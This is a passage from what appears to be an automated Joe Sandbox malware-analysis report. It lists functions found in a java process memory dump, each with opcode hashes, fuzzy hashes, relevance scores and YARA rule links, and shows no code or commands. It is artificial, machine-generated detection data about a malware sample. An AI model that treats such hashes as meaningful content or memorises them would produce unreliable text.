                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: &u1
                                                            • API String ID: 0-296620219
                                                            • Opcode ID: 4a91aadbe1bd2f375cb370acf6f5e317b6152a1ff71193de895c7f56317543a3
                                                            • Instruction ID: 7e5bca2111b2b7750944f68150d1feca49ada04fcea40bbe7a647911f966ab4b
                                                            • Opcode Fuzzy Hash: 4a91aadbe1bd2f375cb370acf6f5e317b6152a1ff71193de895c7f56317543a3
                                                            • Instruction Fuzzy Hash: 56212870D04209DFCB44CFA5C5419AEFBF1EF89340F64C9AAD805AB254E7309A41CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B15F18 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Xc(i
                                                            • API String ID: 0-207616638
                                                            • Opcode ID: d71864524c4b29faa220bba4b774899010c5d7e055c091c6a60e0bf419657812
                                                            • Instruction ID: cfa1b39693622a2fcbcd1dbcda4f7d4882c2a8deb9f808a3cd2f53f0687bcee1
                                                            • Opcode Fuzzy Hash: d71864524c4b29faa220bba4b774899010c5d7e055c091c6a60e0bf419657812
                                                            • Instruction Fuzzy Hash: FB110131B01214CFCB24DF24D589B6DB7A2EBC4711FA482A9E81ACB241EB30D945CBD1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B19978 Relevance: .2, Instructions: 238COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 24d06f2797d31e4642f29ded4e36fe3fe97b11c3a819ab02638055beb72b1c2f
                                                            • Instruction ID: 085c8c17df172500b82dbd606351abb9fbaefaea8872d50da9070a57d7782cfe
                                                            • Opcode Fuzzy Hash: 24d06f2797d31e4642f29ded4e36fe3fe97b11c3a819ab02638055beb72b1c2f
                                                            • Instruction Fuzzy Hash: E091C131600A55CFCB15DF68D4A4A6E7BE2EF89714F4680A9E829DF3A1C730EC41CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B1A3C8 Relevance: .2, Instructions: 225COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 00dde30876ee1e80fe516315556dfd3f012b0ac752700b4438fa02e1e173c5d4
                                                            • Instruction ID: c858ee2b41eb96a862c3fca39e0bc6d622a668f45e2eee0f9ca24ed4aa1099c1
                                                            • Opcode Fuzzy Hash: 00dde30876ee1e80fe516315556dfd3f012b0ac752700b4438fa02e1e173c5d4
                                                            • Instruction Fuzzy Hash: 78819A756002198FCB15DF64C849BAE7BB6FF88314F5584A9F806DB3A1DB34E841CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B1A728 Relevance: .2, Instructions: 205COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 903438e49d1ce0b0101024024e23a7cb0da14916e4b4857f91c6713bc921700b
                                                            • Instruction ID: d1aa68ae3679743f71359c2a0a5a74a10b4972881f5840e074b381ffdd5cdf94
                                                            • Opcode Fuzzy Hash: 903438e49d1ce0b0101024024e23a7cb0da14916e4b4857f91c6713bc921700b
                                                            • Instruction Fuzzy Hash: 7F61B1307051058FCB14EF3AD884A6A7BE9FF4865479544E9E906CB3A5EB30FD42CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B18360 Relevance: .1, Instructions: 98COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5098261d6fcb8d30f91c4169ab3e41ded0f3a133b26f8c1654257dd211d23c24
                                                            • Instruction ID: 6e843d1a32e41901c4ff0bc8a0f69c835bc7560bbd0840d47654457523594393
                                                            • Opcode Fuzzy Hash: 5098261d6fcb8d30f91c4169ab3e41ded0f3a133b26f8c1654257dd211d23c24
                                                            • Instruction Fuzzy Hash: FA31E4317001049FDB04DB74D9557AE7BFAFB8D600F184469E506EB390CF34AD028BA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B152E8 Relevance: .1, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 995d75cfedd053605b05bc50b098e8f6e067940919d0703acbd1d03a79af6a2f
                                                            • Instruction ID: 67b51c9264b01f694dfd6b26b57aab1b7e7b99a5ff78b9d28c5fd5618e266101
                                                            • Opcode Fuzzy Hash: 995d75cfedd053605b05bc50b098e8f6e067940919d0703acbd1d03a79af6a2f
                                                            • Instruction Fuzzy Hash: B4318D31700209DFCB159F65E855A6E7BB2FB88710FA08428F9069B351CB75DD22CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B1A958 Relevance: .1, Instructions: 88COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8a435cbff22810ead02a53775d219dbc44054b8e7b1e4203ebf0bb5348b95086
                                                            • Instruction ID: b416f6d25162552e48c1556e09e56c75adb073683acbf1cac1e3fa20c37c1475
                                                            • Opcode Fuzzy Hash: 8a435cbff22810ead02a53775d219dbc44054b8e7b1e4203ebf0bb5348b95086
                                                            • Instruction Fuzzy Hash: 2D2128303162158BCB2566359A9423D3A9BDFC594476480BAE516CF3D6EF38EC41CB41
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B1A968 Relevance: .1, Instructions: 87COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5696fa55d090b89d285411ba09d9a309422be0f5603d4af2165c8ef625946110
                                                            • Instruction ID: ff5e0b34fd86b931eb0db95bb6d998c488d27b7681cc007c6ec2946b5e7c09e2
                                                            • Opcode Fuzzy Hash: 5696fa55d090b89d285411ba09d9a309422be0f5603d4af2165c8ef625946110
                                                            • Instruction Fuzzy Hash: F42107303112048BDB156635999433E269BDFC5A58F6480B9E517CF3D6EF79EC82CB41
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B1A230 Relevance: .1, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7f94401dbbacb0fa529c409cc2b4000bd4975c3579d51f9df5d7a7cff5b2137d
                                                            • Instruction ID: fbee652af7cf0e9ecbad5acc35d64bcd6fd52c230fed2c6e452c85fd8f499475
                                                            • Opcode Fuzzy Hash: 7f94401dbbacb0fa529c409cc2b4000bd4975c3579d51f9df5d7a7cff5b2137d
                                                            • Instruction Fuzzy Hash: 4931AE32301109AFCF069F54E844AAE7FA6FF88310F608068F905DB251CB36D961DBD0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B140D8 Relevance: .1, Instructions: 76COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f533f845b8e5991ea853e70e4e229e96dd2a838dc8a707195f158e4a51ffaeef
                                                            • Instruction ID: e05537dc773e78fbd1a49003eff56c7c42604044acdad60183bf3aca30f1c4f6
                                                            • Opcode Fuzzy Hash: f533f845b8e5991ea853e70e4e229e96dd2a838dc8a707195f158e4a51ffaeef
                                                            • Instruction Fuzzy Hash: C021E674D002588FDB18CFAAD9557DEBBF2AF89304F18D139D414BB298DB384986CB11
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B16480 Relevance: .1, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7ae728a0ec6403be7da8485bd8fb0e7d9aeb949e71af3b7e927e3be2c2231a18
                                                            • Instruction ID: acf64fd14a112a924d39b65095854af71044e42f9f501bf0d7798c4416d6f22e
                                                            • Opcode Fuzzy Hash: 7ae728a0ec6403be7da8485bd8fb0e7d9aeb949e71af3b7e927e3be2c2231a18
                                                            • Instruction Fuzzy Hash: C721D8357006118FC7249B2AD85562EB7AAEFC975576941BDE90ADF355CF30EC0287C0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B1D0D0 Relevance: .1, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7c1a7669b1085a6bd3a7c53f25737381098505e11f5c990404f54c890dd82a16
                                                            • Instruction ID: e5f4f7ccbcde4b59f9ef56e1835e3c79e2cae77f1ae1716e8682cdd4406d7771
                                                            • Opcode Fuzzy Hash: 7c1a7669b1085a6bd3a7c53f25737381098505e11f5c990404f54c890dd82a16
                                                            • Instruction Fuzzy Hash: 1231A6B4E1020ADFCB44DFA9C5819AEBBF2FF88300F6091AAD818A7354D7749A41CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B1D0C2 Relevance: .1, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a3f387d13381731e6787679de6ab9e959ee4dbba4d963bce854080fe0af4c897
                                                            • Instruction ID: 37f658f0e3b94f2cff1f14847e27df93fbe639620e27164503a67940c5fca2ee
                                                            • Opcode Fuzzy Hash: a3f387d13381731e6787679de6ab9e959ee4dbba4d963bce854080fe0af4c897
                                                            • Instruction Fuzzy Hash: 3231CAB4E1020A9FCB44CFA9C581AAEBBF2FF88300F60919AD814A7755D7749A42CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B152D9 Relevance: .1, Instructions: 66COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0544f19c065ef57826c522a3243ea635f500944c787f74b9470969b7e2293487
                                                            • Instruction ID: 64f424be5913c72c760d9708f80b1a45c57d85ebe2de7d9dc023e37b66d1dd29
                                                            • Opcode Fuzzy Hash: 0544f19c065ef57826c522a3243ea635f500944c787f74b9470969b7e2293487
                                                            • Instruction Fuzzy Hash: 3321CD317042088FCB14AF25E854B6F3BB5FB88714FA08068F8468B341CB74EC11CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B1D1C8 Relevance: .1, Instructions: 66COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d48d565c844cb55657e032f385d6d93b66c35d7c5a9c207ae26e57371e5c1dc7
                                                            • Instruction ID: 94c4aaa7fffbb533a7ce157d25cb302aa8f5c78e7bd7f262f07a85fe64b3b595
                                                            • Opcode Fuzzy Hash: d48d565c844cb55657e032f385d6d93b66c35d7c5a9c207ae26e57371e5c1dc7
                                                            • Instruction Fuzzy Hash: DE21B574E0020ADFDB48DFA9C545A9EFBF1AB89204F54C5A9D418A7314E734AA41CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B1646F Relevance: .1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6fbcc4214ba299fddd59c676755e77b8748244e4a5638b491a810827d2e89870
                                                            • Instruction ID: f49372d98d03424bd6b0cf89358a92ee0337935bd1e082cc8535ae0fb1588f0a
                                                            • Opcode Fuzzy Hash: 6fbcc4214ba299fddd59c676755e77b8748244e4a5638b491a810827d2e89870
                                                            • Instruction Fuzzy Hash: C211C1353005119FC7149B29D895A2E77AEFF8565576940ACF90ACB355CF24EC028790
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B1D1D8 Relevance: .1, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ea5143596e88d0f0ea425c2d1753ff968ca796f0ec1fce38822490c79f2a6d2a
                                                            • Instruction ID: 4e3a33380de43ca958f75b1c9621cc27dc667f376c37865d93e0af45cf090c62
                                                            • Opcode Fuzzy Hash: ea5143596e88d0f0ea425c2d1753ff968ca796f0ec1fce38822490c79f2a6d2a
                                                            • Instruction Fuzzy Hash: 2A21D6B4E0021ADFCB48DFA9C545AAEFBF1AF89304F50C5A5D418A7314D7349A41CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B18350 Relevance: .1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 76e84d618dcc1faf44e72ce671541c4be6aee2f808724bdb7146871e14e2376d
                                                            • Instruction ID: 28c39f489b124c3756d797bb93057d6cc5116663fab5c0e2180e923bb7b1c3bf
                                                            • Opcode Fuzzy Hash: 76e84d618dcc1faf44e72ce671541c4be6aee2f808724bdb7146871e14e2376d
                                                            • Instruction Fuzzy Hash: 26116D76A002049BDB149F65D946B9EBBBAFB8C610F284069F906A7350DF71AD11CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B17050 Relevance: .1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 97096519b21ea3fd61dcc8b938e933c0f5a72836647c1c22b4ef1d699c45f165
                                                            • Instruction ID: 4299ea5b750be599026534142af29653caaf915355842cee11a9e6792c0cdd3a
                                                            • Opcode Fuzzy Hash: 97096519b21ea3fd61dcc8b938e933c0f5a72836647c1c22b4ef1d699c45f165
                                                            • Instruction Fuzzy Hash: 09218931900208DFCB20CF98D848FAAFBF6FB48310F5484AAE5098B251DB75A954DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B16220 Relevance: .1, Instructions: 58COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 72031f69b76b208b4d29e9261d06f879a1059aa792dfc39edd51d554456c6f61
                                                            • Instruction ID: 5a4d2e024022e9a6b49cb7391d05dea5ee44561c4f8d24bcadac3101c0a4701f
                                                            • Opcode Fuzzy Hash: 72031f69b76b208b4d29e9261d06f879a1059aa792dfc39edd51d554456c6f61
                                                            • Instruction Fuzzy Hash: 2111A0717002068FDB289FA5D894B2EBBAEEB84218F5444BDE485CB280DBB4D841CBD0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B1EEA8 Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e9e0bca2bc4980a3694727edf1dcf2aa677f1bfe1935ef4febf28494d6e19f8b
                                                            • Instruction ID: bba8c32bc0a324cd0803d6ecc9a6ab62d31bc1d3b8b74e19510429d911a4a71c
                                                            • Opcode Fuzzy Hash: e9e0bca2bc4980a3694727edf1dcf2aa677f1bfe1935ef4febf28494d6e19f8b
                                                            • Instruction Fuzzy Hash: FB11E434E00108DFDB44DFA9C584A9EFBF2EF89200F54C4A9A819AB354DB30DA11CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B1A221 Relevance: .1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9fa23b90bf0693b4541f47243941760ff64e97d869caff6bec3cae92817516d2
                                                            • Instruction ID: 8212be37a8d359ade0c5883bd0f35e8fafd023fa4dfd0d4ad72e44158178d0f0
                                                            • Opcode Fuzzy Hash: 9fa23b90bf0693b4541f47243941760ff64e97d869caff6bec3cae92817516d2
                                                            • Instruction Fuzzy Hash: D511A032601219DFCB05EF64E984BAE7BA1FF48310F648469F845DB245D735D960CBD0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B1A338 Relevance: .0, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5e247dc431587e8e258594048b6168188b52765d51abbf763bd3924a81086f1a
                                                            • Instruction ID: b01988c0925057b89babfa7ade31184ce82f331075f8d74f73b4dc25c7bb1f27
                                                            • Opcode Fuzzy Hash: 5e247dc431587e8e258594048b6168188b52765d51abbf763bd3924a81086f1a
                                                            • Instruction Fuzzy Hash: 6601D6327001146F8B059E69A800AEF7BEBDBC9B50F64802AF505D7280DE719D1197D0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B1A328 Relevance: .0, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8221a851eb5e62c7e01507659f278ffc4cadc6b3b1fb245905fb40181b734876
                                                            • Instruction ID: befd4d8f756feb150588d353ccc3b89ef880bb2f57b9789123eb134bd9b30bb6
                                                            • Opcode Fuzzy Hash: 8221a851eb5e62c7e01507659f278ffc4cadc6b3b1fb245905fb40181b734876
                                                            • Instruction Fuzzy Hash: EB0186336045156FDB018F59EC01BDF7BAAEB89B91F54C065F608D7280DB32E911D790
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B1BAF0 Relevance: .0, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2fbcb0d523792b3397eee2425b9dfeceae9c68fad68f2d450afead300ec1c41b
                                                            • Instruction ID: 9e1d223e36e8bcf47af466058e043189494f1257d0591f096b2fcf6a1d16b043
                                                            • Opcode Fuzzy Hash: 2fbcb0d523792b3397eee2425b9dfeceae9c68fad68f2d450afead300ec1c41b
                                                            • Instruction Fuzzy Hash: 8201D130E21208DFC700DFB4E84E65EBFB1FF89206F2484A5E409D3358EB308A428B41
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B1BB00 Relevance: .0, Instructions: 37COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a81cd41742d6164750c60d5fcd0c2d5c7b71851d1a23ea59cb05301991080909
                                                            • Instruction ID: 5d4629c5abfdb8a0dc6a018df181a8570f59d5941b99ff500b0abe34a11a026c
                                                            • Opcode Fuzzy Hash: a81cd41742d6164750c60d5fcd0c2d5c7b71851d1a23ea59cb05301991080909
                                                            • Instruction Fuzzy Hash: 95F0AF30E25208DFC705DFB5E55E29EBFB6FB89205F64C4A5D40993258EB308A428B51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B1DB2D Relevance: .0, Instructions: 32COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f97c53dfdbe22278aecc76b5488d499a2b73d1205c7106312a4fa43f5e10a255
                                                            • Instruction ID: c716f3febf26b2e44d630f8e9303ac6b093648df3d39d0a782e4b49aba8b01b1
                                                            • Opcode Fuzzy Hash: f97c53dfdbe22278aecc76b5488d499a2b73d1205c7106312a4fa43f5e10a255
                                                            • Instruction Fuzzy Hash: 45115878A01228CFCBA9CF68C985ADCBBB1BF48300F1041D9E908A7325DB319E81CF40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B1C322 Relevance: .0, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4c5c21f8a76e63fce86fd8798319d93a53c233f6e5b91e4bf1315924eefa6fb1
                                                            • Instruction ID: 3e5ec4a41202c0df3c9aca64eb58a68d0fae6518f4c80120b0a90d2ba623d353
                                                            • Opcode Fuzzy Hash: 4c5c21f8a76e63fce86fd8798319d93a53c233f6e5b91e4bf1315924eefa6fb1
                                                            • Instruction Fuzzy Hash: 43F0DA70E016188FDF54CFAAC95078DFAF2BB8A300F10D1A9D009AB354D6345F818F65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B1D9BA Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ace8963ea1a1eadd3cbb1ee0eea1397bea77dabe8f6f102371394dbb55e83681
                                                            • Instruction ID: d71ba52dca75ecc61ca1e6e663d89ef669426e89b5217333b21a04deb2b5b179
                                                            • Opcode Fuzzy Hash: ace8963ea1a1eadd3cbb1ee0eea1397bea77dabe8f6f102371394dbb55e83681
                                                            • Instruction Fuzzy Hash: 6CF05A74912668CFCB65CF64D988ADDBBB1FB49316F1041D9E80AA7350DB30AE81CF40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B1840D Relevance: .0, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6f92e032293e356c83dd0432ae87fc57ac13d786d628bad3bfd66b006c7749c7
                                                            • Instruction ID: b2e5ebb180d63ddcdf9ccc9473afab7de7aefe695f18cd365fae879026f8433b
